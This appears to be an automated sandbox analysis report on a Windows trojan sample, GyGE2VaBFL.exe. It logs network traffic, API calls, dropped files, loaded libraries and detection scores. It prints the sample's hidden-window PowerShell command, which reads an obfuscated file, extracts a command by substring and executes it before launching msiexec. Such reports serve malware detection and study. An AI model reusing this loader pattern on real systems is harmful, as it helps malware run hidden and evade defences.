      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknown | HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49720 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49721 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49725 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49729 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Code function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405339

      System Summary

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exeJump to dropped file
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Windows\resources\0809\Dkvingernes88Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Windows\resources\0809\Dkvingernes88\malagaJump to behavior
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: GyGE2VaBFL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/27@2/3
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045EA
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Users\user\AppData\Local\afsindigstesJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Users\user\AppData\Local\Temp\nst2C19.tmpJump to behavior
      Source: GyGE2VaBFL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: GyGE2VaBFL.exeVirustotal: Detection: 63%
      Source: GyGE2VaBFL.exeReversingLabs: Detection: 47%
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile read: C:\Users\user\Desktop\GyGE2VaBFL.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\GyGE2VaBFL.exe "C:\Users\user\Desktop\GyGE2VaBFL.exe"
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
